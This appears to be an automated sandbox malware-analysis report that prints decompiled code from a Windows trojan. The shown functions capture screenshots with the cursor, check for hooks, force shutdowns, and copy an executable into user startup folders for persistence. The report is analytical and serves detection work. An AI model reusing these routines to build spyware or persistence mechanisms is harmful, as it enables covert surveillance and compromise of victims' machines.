				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
				_v108 = _t176;
				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
					L66:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					if(_v60 != 0) {
						FreeLibrary(_v60);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					return _v32;
				} else {
					_t181 = LoadLibraryA("ole32.dll");
					_v60 = _t181;
					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
					_v120 = _t182;
					if(_t182 == 0) {
						goto L66;
					}
					_t183 = LoadLibraryA("gdi32.dll");
					_v16 = _t183;
					_t262 = GetProcAddress(_t183, "CreateDCW");
					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
					_v56 = GetProcAddress(_v16, "SelectObject");
					_v76 = GetProcAddress(_v16, "BitBlt");
					_v84 = GetProcAddress(_v16, "DeleteObject");
					_t191 = GetProcAddress(_v16, "DeleteDC");
					_v68 = _t191;
					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
						goto L66;
					} else {
						_push(0);
						_push( &_v104);
						_push( &_v116);
						_v104 = 1;
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						if(_v24() != 0) {
							goto L66;
						}
						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
						_v24 = _t268;
						if(_t268 == 0) {
							L65:
							_v80(_v116);
							goto L66;
						}
						_t197 = _v12(_t268);
						_v36 = _t197;
						if(_t197 == 0) {
							L64:
							_v68(_v24);
							goto L65;
						}
						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						_v12 = _t199;
						if(_t199 == 0) {
							L24:
							_t263 = 0;
							goto L26;
						} else {
							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
								_v12 = 0;
							}
							if(_v12 != 0) {
								_t263 = _a12;
								L26:
								if(_t263 == 0) {
									_t200 = _v28(_t268, 8);
									_t269 = _t200;
									_a12 = _v28(_v24, 0xa);
								} else {
									_t269 = _t263 & 0x0000ffff;
									_a12 = _t269;
								}
								_t202 = _v44(_v24, _t269, _a12);
								_v44 = _t202;
								if(_t202 == 0) {
									L63:
									_v68(_v36);
									goto L64;
								} else {
									_t204 = _v56(_v36, _t202);
									_v112 = _t204;
									if(_t204 == 0) {
										L62:
										_v84(_v44);
										goto L63;
									}
									_t206 = 0;
									_t248 = 0;
									if(_t263 != 0) {
										_t260 = (_t263 & 0x0000ffff) >> 1;
										_t206 =  <  ? 0 : _v52.x - _t260;
										_t248 =  <  ? 0 : _v52.y - _t260;
										_t81 =  &_v52;
										 *_t81 = _v52.x - _t206;
										if( *_t81 < 0) {
											_v52.x = 0;
										}
										_t84 =  &(_v52.y);
										 *_t84 = _v52.y - _t248;
										if( *_t84 < 0) {
											_v52.y = 0;
										}
									}
									_push(0x40cc0020);
									_push(_t248);
									_push(_t206);
									_push(_v24);
									_push(_a12);
									_push(_t269);
									_push(0);
									_push(0);
									_push(_v36);
									if(_v76() == 0) {
										L61:
										_v56(_v36, _v112);
										goto L62;
									} else {
										if(_v12 != 0) {
											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
											_t239 = _v52.y - _v172.yHotspot;
											_t240 =  <  ? 0 : _t239;
											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
										}
										_push( &_v12);
										_push(0);
										_push(_v44);
										_v12 = 0;
										if(_v88() != 0 || _v12 == 0) {
											goto L61;
										} else {
											_push( &_v28);
											_push( &_a12);
											_a12 = 0;
											_v28 = 0;
											if(_v40() != 0) {
												L60:
												_v72(_v12);
												goto L61;
											}
											_t215 = _v28;
											if(_v28 == 0 || _a12 == 0) {
												goto L60;
											} else {
												_t264 = E004163F1(_t215);
												_v40 = _t264;
												if(_t264 == 0) {
													goto L60;
												}
												_push(_t264);
												_push(_v28);
												_push(_a12);
												if(_v64() != 0) {
													L52:
													E00416421(_v40);
													if(_a12 == 0) {
														_push( &_v32);
														_push(1);
														_push(0);
														if(_v120() == 0 && _v32 != 0) {
															_v152 = 0;
															if(_a8 > 0) {
																E0041645D( &_v148, 0x403540, 0x10);
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
																_v152 = _v152 + 1;
															}
															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
															_t224 = _v32;
															if(_t223 == 0) {
																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
															} else {
																 *((intOrPtr*)( *_t224 + 8))(_t224);
																_v32 = 0;
															}
														}
													}
													goto L60;
												}
												_t272 = 0;
												if(_a12 <= 0) {
													goto L52;
												}
												_t265 = _t264 + 0x30;
												while(lstrcmpiW(_a4,  *_t265) != 0) {
													_t272 = _t272 + 1;
													_t265 =  &(_t265[0x13]);
													if(_t272 < _a12) {
														continue;
													}
													goto L52;
												}
												E0041645D( &_v188, _t272 * 0x4c + _v40, 0x10);
												_a12 = 0;
												goto L52;
											}
										}
									}
								}
							}
							goto L24;
						}
					}
				}
			}

0x0040f228
0x0040f22b
0x0040f22e
0x0040f231
0x0040f238
0x0040f23b
0x0040f23e
0x0040f241
0x0040f24f
0x0040f25c
0x0040f269
0x0040f276
0x0040f283
0x0040f290
0x0040f29d
0x0040f2a0
0x0040f2a2
0x0040f2a8
0x0040f68c
0x0040f695
0x0040f69a
0x0040f69a
0x0040f69f
0x0040f6a4
0x0040f6a4
0x0040f6a9
0x0040f6ae
0x0040f6ae
0x0040f6b7
0x0040f2e3
0x0040f2e8
0x0040f2f0
0x0040f2f3
0x0040f2f5
0x0040f2fa
0x00000000
0x00000000
0x0040f305
0x0040f30d
0x0040f31a
0x0040f326
0x0040f333
0x0040f340
0x0040f34d
0x0040f35a
0x0040f367
0x0040f36a
0x0040f36c
0x0040f371
0x00000000
0x0040f3b5
0x0040f3b5
0x0040f3b9
0x0040f3bd
0x0040f3be
0x0040f3c5
0x0040f3c8
0x0040f3cb
0x0040f3d3
0x00000000
0x00000000
0x0040f3e3
0x0040f3e5
0x0040f3ea
0x0040f686
0x0040f689
0x00000000
0x0040f689
0x0040f3f1
0x0040f3f4
0x0040f3f9
0x0040f680
0x0040f683
0x00000000
0x0040f683
0x0040f40e
0x0040f414
0x0040f419
0x0040f443
0x0040f443
0x00000000
0x0040f41b
0x0040f42b
0x0040f43b
0x0040f43b
0x0040f441
0x0040f447
0x0040f44a
0x0040f44d
0x0040f45a
0x0040f462
0x0040f467
0x0040f44f
0x0040f44f
0x0040f452
0x0040f452
0x0040f471
0x0040f474
0x0040f479
0x0040f67a
0x0040f67d
0x00000000
0x0040f47f
0x0040f483
0x0040f486
0x0040f48b
0x0040f674
0x0040f677
0x00000000
0x0040f677
0x0040f491
0x0040f493
0x0040f498
0x0040f4a3
0x0040f4a7
0x0040f4ac
0x0040f4af
0x0040f4af
0x0040f4b2
0x0040f4b4
0x0040f4b4
0x0040f4b7
0x0040f4b7
0x0040f4ba
0x0040f4bc
0x0040f4bc
0x0040f4ba
0x0040f4bf
0x0040f4c4
0x0040f4c5
0x0040f4c6
0x0040f4c9
0x0040f4cc
0x0040f4cd
0x0040f4ce
0x0040f4cf
0x0040f4d7
0x0040f66b
0x0040f671
0x00000000
0x0040f4dd
0x0040f4e0
0x0040f4f1
0x0040f4f4
0x0040f4fa
0x0040f502
0x0040f502
0x0040f50b
0x0040f50c
0x0040f50d
0x0040f510
0x0040f518
0x00000000
0x0040f527
0x0040f52a
0x0040f52e
0x0040f52f
0x0040f532
0x0040f53a
0x0040f665
0x0040f668
0x00000000
0x0040f668
0x0040f540
0x0040f545
0x00000000
0x0040f554
0x0040f559
0x0040f55b
0x0040f560
0x00000000
0x00000000
0x0040f566
0x0040f567
0x0040f56a
0x0040f572
0x0040f5b0
0x0040f5b3
0x0040f5bb
0x0040f5c4
0x0040f5c8
0x0040f5c9
0x0040f5cf
0x0040f5de
0x0040f5e7
0x0040f5f7
0x0040f605
0x0040f616
0x0040f626
0x0040f62a
0x0040f62a
0x0040f644
0x0040f649
0x0040f64c
0x0040f662
0x0040f64e
0x0040f651
0x0040f654
0x0040f654
0x0040f64c
0x0040f5cf
0x00000000
0x0040f5bb
0x0040f574
0x0040f579
0x00000000
0x00000000
0x0040f57b
0x0040f57e
0x0040f58d
0x0040f58e
0x0040f594
0x00000000
0x00000000
0x00000000
0x0040f596
0x0040f5a8
0x0040f5ad
0x00000000
0x0040f5ad
0x0040f545
0x0040f518
0x0040f4d7
0x0040f479
0x00000000
0x0040f441
0x0040f419
0x0040f371

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0040F241
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040F252
GetProcAddress.KERNEL32(?,GdiplusShutdown), ref: 0040F25F
GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 0040F26C
GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 0040F279
GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 0040F286
GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 0040F293
GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 0040F2A0
LoadLibraryA.KERNEL32(ole32.dll), ref: 0040F2E8
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040F2F3
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0040F305
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040F310
GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040F31C
GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040F329
GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040F336
GetProcAddress.KERNEL32(?,SelectObject), ref: 0040F343
GetProcAddress.KERNEL32(?,BitBlt), ref: 0040F350
GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040F35D
GetProcAddress.KERNEL32(?,DeleteDC), ref: 0040F36A
LoadImageW.USER32 ref: 0040F40E
GetIconInfo.USER32(00000000,?), ref: 0040F423
GetCursorPos.USER32(?), ref: 0040F431
DrawIcon.USER32 ref: 0040F502
lstrcmpiW.KERNEL32(?,-00000030), ref: 0040F583
FreeLibrary.KERNEL32(?), ref: 0040F69A
FreeLibrary.KERNEL32(?), ref: 0040F6A4
FreeLibrary.KERNEL32(?), ref: 0040F6AE

Strings

CreateDCW, xrefs: 0040F307
GdiplusShutdown, xrefs: 0040F254
DISPLAY, xrefs: 0040F3DC
CreateCompatibleBitmap, xrefs: 0040F31E
GdipGetImageEncodersSize, xrefs: 0040F27B
DeleteObject, xrefs: 0040F352
GetDeviceCaps, xrefs: 0040F32B
BitBlt, xrefs: 0040F345
gdiplus.dll, xrefs: 0040F223
GdipCreateBitmapFromHBITMAP, xrefs: 0040F261
ole32.dll, xrefs: 0040F2E3
GdipDisposeImage, xrefs: 0040F26E
DeleteDC, xrefs: 0040F35F
GdipGetImageEncoders, xrefs: 0040F288
SelectObject, xrefs: 0040F338
GdiplusStartup, xrefs: 0040F249
GdipSaveImageToStream, xrefs: 0040F295
CreateCompatibleDC, xrefs: 0040F312
gdi32.dll, xrefs: 0040F300
CreateStreamOnHGlobal, xrefs: 0040F2EA

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
API String ID: 1554524784-1167942225
Opcode ID: bbfb7271da9023b2b961b17bd7e9098c7fd40228dda027d17a1f6b42fbc8e1ae
Instruction ID: daa54bb737d235d3338be45f21d37602089b3d4cc920bcd6889f1cd0fecd3cf7
Opcode Fuzzy Hash: bbfb7271da9023b2b961b17bd7e9098c7fd40228dda027d17a1f6b42fbc8e1ae
Instruction Fuzzy Hash: C3E1D771D00259ABCF209FE1CC85AAEBFB9FF08301F14453AE915B26A0D7799A45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00406F85, Relevance: 30.2, APIs: 20, Instructions: 242
synchronizationsleepshutdownCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00406F85(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t79;
				intOrPtr* _t80;
				void* _t82;
				void* _t84;
				void* _t88;
				void* _t92;
				int _t100;
				int _t108;
				void* _t113;
				intOrPtr _t130;
				void* _t138;
				void* _t145;
				void* _t147;
				void* _t152;
				void* _t154;

				_t138 = __edx;
				_t135 = __ecx;
				_t152 = _t154 - 0x70;
				_t149 = _t152 + 0x50;
				 *(_t152 + 0x6f) = 0;
				if(E0041B63F(0, __ecx, _t152 + 0x50,  *0x42299c) != 0) {
					 *(_t152 + 0x68) =  *(_t152 + 0x54);
					_t130 = E00406C01(_t152 + 0x68, __ecx,  *(_t152 + 0x50));
					 *((intOrPtr*)(_t152 + 0x60)) = _t130;
					if(_t130 == 0) {
						 *(_t152 + 0x68) = 0;
					}
					_t71 = E0041B6E7(_t152 + 0x50);
				}
				if( *(_t152 + 0x68) != 0x1e6) {
					__eflags =  *(_t152 + 0x68) - 0xc;
					if( *(_t152 + 0x68) != 0xc) {
						L41:
						E00416421( *((intOrPtr*)(_t152 + 0x60)));
						return  *(_t152 + 0x6f);
					}
					_t74 = E0040679A(_t135, 0x8889347b, 2);
					 *(_t152 + 0x5c) = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						L39:
						__eflags =  *(_t152 + 0x7c) - 1;
						if( *(_t152 + 0x7c) == 1) {
							E00417E86(0, _t149,  *0x42299c);
						}
						goto L41;
					}
					E00406762(0x19367401, _t152 - 0x18, 1);
					_t79 = E00419C04(_t152 - 0x18);
					_t149 = GetFileAttributesExW;
					__eflags = _t79;
					if(_t79 == 0) {
						L23:
						_t80 =  *0x422944; // 0x0
						__imp__IsWellKnownSid( *_t80, 0x16);
						__eflags = _t80 - 1;
						if(__eflags != 0) {
							 *(_t152 + 0x6f) = 0;
							_t82 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
							__eflags = _t82;
							if(_t82 == 0) {
								L29:
								_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
								_t84 = E0041C844(_t135, L0040E847,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 4)));
								_t149 = 0x4229a0;
								 *(_t152 + 0x6f) = L0040E847(_t84, 0, L0040E847, 0x4229a0);
								L30:
								__eflags =  *(_t152 + 0x6f) - 1;
								if( *(_t152 + 0x6f) == 1) {
									_t88 = E00417CE8(_t152 - 0x294, 0, _t149, 0, _t152 + 0x4c);
									__eflags = _t88;
									 *(_t152 + 0x6f) = _t88 != 0;
									__eflags =  *(_t152 + 0x6f);
									if( *(_t152 + 0x6f) != 0) {
										E00406762(0x1a43533f, _t152 - 0x18, 1);
										_t92 = CreateEventW(0x422978, 1, 0, _t152 - 0x18);
										_t145 =  *(_t152 + 0x4c);
										 *(_t152 + 0x64) = _t92;
										 *(_t152 + 0x68) = _t145;
										_push(0xffffffff);
										__eflags = _t92;
										if(_t92 != 0) {
											WaitForMultipleObjects(2, _t152 + 0x64, 0, ??);
										} else {
											WaitForSingleObject(_t145, ??);
										}
										_t149 = CloseHandle;
										__eflags =  *(_t152 + 0x64);
										if( *(_t152 + 0x64) != 0) {
											CloseHandle( *(_t152 + 0x64));
										}
										CloseHandle( *(_t152 + 0x50));
										CloseHandle(_t145);
									}
								}
								L38:
								E00419BF4( *(_t152 + 0x5c));
								goto L39;
							}
							__eflags =  *(_t152 + 0x6f) - 0xe9;
							if( *(_t152 + 0x6f) != 0xe9) {
								goto L29;
							}
							_t100 = GetFileAttributesExW(0x422dae, 0x78f16360, _t152 + 0x68);
							__eflags = _t100 - 1;
							if(_t100 != 1) {
								goto L29;
							}
							_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
							E0041C844(_t135, E0040EBB3,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 8)));
							_push( *((intOrPtr*)(_t152 + 0x78)));
							_t149 = 0x4229a0;
							_push(_t152 - 0x294);
							 *(_t152 + 0x6f) = E0040EBB3(_t152 - 0x294, 0x4229a0);
							VirtualFree( *(_t152 + 0x68), 0, 0x8000);
							goto L30;
						}
						 *(_t152 + 0x6f) = E0040EECB(__eflags);
						goto L38;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						 *(_t152 + 0x6f) = 0;
						_t108 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
						__eflags = _t108;
						if(_t108 == 0) {
							goto L22;
						}
						__eflags =  *(_t152 + 0x6f) - 0xe9;
						if( *(_t152 + 0x6f) == 0xe9) {
							goto L23;
						}
						L22:
						Sleep(0x1f4);
					}
				}
				if(E0040EAFC(_t71, 0, _t138,  *((intOrPtr*)(_t152 + 0x60))) != 0) {
					E00406762(0x32901130, _t152 - 0x18, 1);
					_t113 = CreateMutexW(0x422978, 1, _t152 - 0x18);
					 *(_t152 + 0x7c) = _t113;
					if(_t113 != 0) {
						if(GetLastError() == 0xb7) {
							CloseHandle( *(_t152 + 0x7c));
							 *(_t152 + 0x7c) = 0;
						}
						if( *(_t152 + 0x7c) != 0) {
							E0041CD26(_t135, _t152 - 0x8c);
							if(( *(_t152 - 0x8c) & 0x00000020) != 0) {
								 *0x422940 =  *0x422940 | 0x00000010;
							}
							E0041CB9B();
							if(( *0x422940 & 0x00000010) != 0) {
								ExitWindowsEx(0x14, 0x80000000);
							}
							E00406762(0x1a43533f, _t152 - 0x18, 1);
							_t147 = OpenEventW(2, 0, _t152 - 0x18);
							if(_t147 != 0) {
								SetEvent(_t147);
								CloseHandle(_t147);
							}
							E00406CBE(1);
							 *(_t152 + 0x6f) = 1;
							CloseHandle( *(_t152 + 0x7c));
						}
					}
				}
				goto L41;
			}

0x00406f85
0x00406f85
0x00406f86
0x00406f9d
0x00406fa0
0x00406faa
0x00406fb2
0x00406fb8
0x00406fbd
0x00406fc2
0x00406fc4
0x00406fc4
0x00406fca
0x00406fca
0x00406fd6
0x004070b5
0x004070b9
0x00407276
0x00407279
0x00407288
0x00407288
0x004070c6
0x004070cb
0x004070ce
0x004070d0
0x00407265
0x00407265
0x00407269
0x00407271
0x00407271
0x00000000
0x00407269
0x004070e1
0x004070ea
0x004070ef
0x004070fb
0x004070fd
0x00407125
0x00407125
0x0040712e
0x00407134
0x00407137
0x00407150
0x00407153
0x00407155
0x00407157
0x004071b3
0x004071b6
0x004071c0
0x004071c5
0x004071d7
0x004071da
0x004071da
0x004071de
0x004071ee
0x004071f3
0x004071f5
0x004071f9
0x004071fc
0x00407209
0x0040721a
0x00407220
0x00407223
0x00407226
0x00407229
0x0040722b
0x0040722d
0x0040723f
0x0040722f
0x00407230
0x00407230
0x00407245
0x0040724b
0x0040724e
0x00407253
0x00407253
0x00407258
0x0040725b
0x0040725b
0x004071fc
0x0040725d
0x00407260
0x00000000
0x00407260
0x00407159
0x0040715d
0x00000000
0x00000000
0x0040716d
0x0040716f
0x00407172
0x00000000
0x00000000
0x00407177
0x00407181
0x00407186
0x00407192
0x00407197
0x004071a8
0x004071ab
0x00000000
0x004071ab
0x0040713e
0x00000000
0x00000000
0x00000000
0x00000000
0x004070ff
0x004070ff
0x00407109
0x0040710c
0x0040710e
0x00407110
0x00000000
0x00000000
0x00407112
0x00407116
0x00000000
0x00000000
0x00407118
0x0040711d
0x0040711d
0x004070ff
0x00406fe6
0x00406ff7
0x00407007
0x0040700d
0x00407012
0x00407029
0x0040702e
0x00407030
0x00407030
0x00407036
0x00407043
0x0040704f
0x00407051
0x00407051
0x00407058
0x00407064
0x0040706d
0x0040706d
0x0040707e
0x00407090
0x00407094
0x00407097
0x0040709e
0x0040709e
0x004070a2
0x004070aa
0x004070ae
0x004070ae
0x00407036
0x00407012
0x00000000

APIs

Part of subcall function 0041B63F: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B664
Part of subcall function 0041B63F: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B677

CreateMutexW.KERNEL32(00422978,00000001,?,32901130,?,00000001,?,?,?,00000000), ref: 00407007
GetLastError.KERNEL32(?,?,00000000), ref: 00407018
CloseHandle.KERNEL32(00000001,?,?,00000000), ref: 0040702E
ExitWindowsEx.USER32(00000014,80000000), ref: 0040706D
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001,?,?,?,00000000), ref: 0040708A
SetEvent.KERNEL32(00000000,?,?,00000000), ref: 00407097
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040709E
CloseHandle.KERNEL32(00000001,00000001,?,?,00000000), ref: 004070AE
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0040710C
Sleep.KERNEL32(000001F4,?,?,00000000), ref: 0040711D
IsWellKnownSid.ADVAPI32(00000000,00000016,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0040712E
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,?,00000001,00000000,?,?,00000000), ref: 00407153
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,00000000), ref: 004071AB
GetFileAttributesExW.KERNEL32(00422DAE,78F16360,?,?,?,00000000), ref: 0040716D

Part of subcall function 0041C844: VirtualProtect.KERNEL32(0040E847,?,00000040,00000000,74B5F9B0,?,?,004071C5,?,?,?,?,00000000), ref: 0041C859
Part of subcall function 0041C844: VirtualProtect.KERNEL32(0040E847,?,00000000,00000000,?,?,004071C5,?,?,?,?,00000000), ref: 0041C88C

CreateEventW.KERNEL32(00422978,00000001,00000000,?,1A43533F,?,00000001,?,?,00000000,004229A0,00000000,?,?,?), ref: 0040721A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000), ref: 00407230
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000), ref: 0040723F
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00407253
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00407258
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040725B

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
String ID:
API String ID: 561470431-0
Opcode ID: cc22bac0ad0d528d494838612f812a993b95ada581cecfa0022af5c1be135b8d
Instruction ID: cefdd733b68a1f684ce7cee773fdfd2090efc8e94e62b965008ea2b1982ce5e8
Opcode Fuzzy Hash: cc22bac0ad0d528d494838612f812a993b95ada581cecfa0022af5c1be135b8d
Instruction Fuzzy Hash: 5791A271904248AFDF20AF61CE85EEE3BA9EF04354F00007AFD15B62E1C7789855CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EECB, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040EECB(void* __eflags) {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				char _v88;
				char _v608;
				short _v1128;
				char _v1648;
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t63;
				int _t69;
				char _t70;
				char _t76;
				int _t80;
				char _t81;
				char _t82;
				char _t86;
				char _t88;
				WCHAR* _t98;
				int _t99;
				CHAR* _t110;
				char* _t111;
				WCHAR* _t112;
				struct HINSTANCE__* _t113;
				signed int _t114;
				void* _t115;

				_t112 =  &_v56;
				_v5 = 0;
				E004159A4(0xe1, _t112);
				_t113 = LoadLibraryW(_t112);
				if(_t113 == 0) {
					L7:
					return 0;
				} else {
					_t110 =  &_v88;
					E0041596E(0xe2, _t110);
					_t63 = GetProcAddress(_t113, _t110);
					if(_t63 != 0) {
						_push( &_v12);
						_t106 =  &_v608;
						_push( &_v608);
						_v12 = 0x104;
						if( *_t63() == 1) {
							_t98 =  &_v1128;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
							if(_t98 == 0) {
								_t106 =  &_v608;
								_t99 = E00416F70(_t106);
								_v12 = _t99;
								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
									_t106 = _t115 + _v12 * 2 - 0x464;
									E004167C2(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t113);
					if(_v5 != 0) {
						_v5 = 0;
						_v28 = 0;
						_t111 = L".exe";
						do {
							_v12 = 0;
							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
							_v24 = _t69;
							__eflags = _t69;
							if(_t69 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t114 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
									__eflags = _t80;
									if(_t80 == 0) {
										_t81 = _v16;
										__eflags = _t81;
										if(_t81 != 0) {
											_t106 =  &_v608;
											_t82 = E004074DB( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
											__eflags = _t82;
											if(_t82 != 0) {
												_t86 = E0041BCB4( &_v1128,  &_v608,  &_v608);
												__eflags = _t86;
												if(_t86 != 0) {
													_t88 = E0041BA36( &_v608);
													__eflags = _t88;
													if(_t88 != 0) {
														__eflags = E0041A8D1(0,  &_v608,  &_v1648, _t111, 6);
														if(__eflags != 0) {
															__eflags = E0040E612( &_v608, __eflags, 0,  &_v1648, 0);
															if(__eflags != 0) {
																_v5 = 1;
																E0040E73F( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t114 = _t114 + 1;
									__eflags = _t114 - _v20;
								} while (_t114 < _v20);
								goto L23;
							}
							__eflags = _t69 - 0xea;
							if(_t69 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v24 - 0xea;
						} while (_v24 == 0xea);
						_t70 =  &_v1128;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = E0041A8D1(0,  &_v1128,  &_v1648, _t111, 6);
							if(__eflags != 0) {
								_t76 = E0040E612(_t106, __eflags, 0,  &_v1648, 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}

0x0040eed9
0x0040eee1
0x0040eee4
0x0040eef2
0x0040eef6
0x0040ef93
0x00000000
0x0040eefc
0x0040eefc
0x0040ef04
0x0040ef0d
0x0040ef15
0x0040ef1a
0x0040ef1b
0x0040ef21
0x0040ef22
0x0040ef2e
0x0040ef30
0x0040ef3e
0x0040ef46
0x0040ef48
0x0040ef4e
0x0040ef54
0x0040ef69
0x0040ef6e
0x0040ef7e
0x0040ef83
0x0040ef83
0x0040ef69
0x0040ef46
0x0040ef2e
0x0040ef88
0x0040ef91
0x0040ef9a
0x0040ef9d
0x0040efa0
0x0040efa5
0x0040efbb
0x0040efbe
0x0040efc4
0x0040efc7
0x0040efc9
0x0040efd6
0x0040efd6
0x0040efd9
0x00000000
0x00000000
0x0040efdf
0x0040efe1
0x0040efe4
0x0040f0a0
0x0040f0a3
0x00000000
0x00000000
0x00000000
0x00000000
0x0040efea
0x0040efea
0x0040eff7
0x0040effd
0x0040efff
0x0040f005
0x0040f008
0x0040f00a
0x0040f010
0x0040f01a
0x0040f01f
0x0040f021
0x0040f031
0x0040f036
0x0040f038
0x0040f041
0x0040f046
0x0040f048
0x0040f061
0x0040f063
0x0040f073
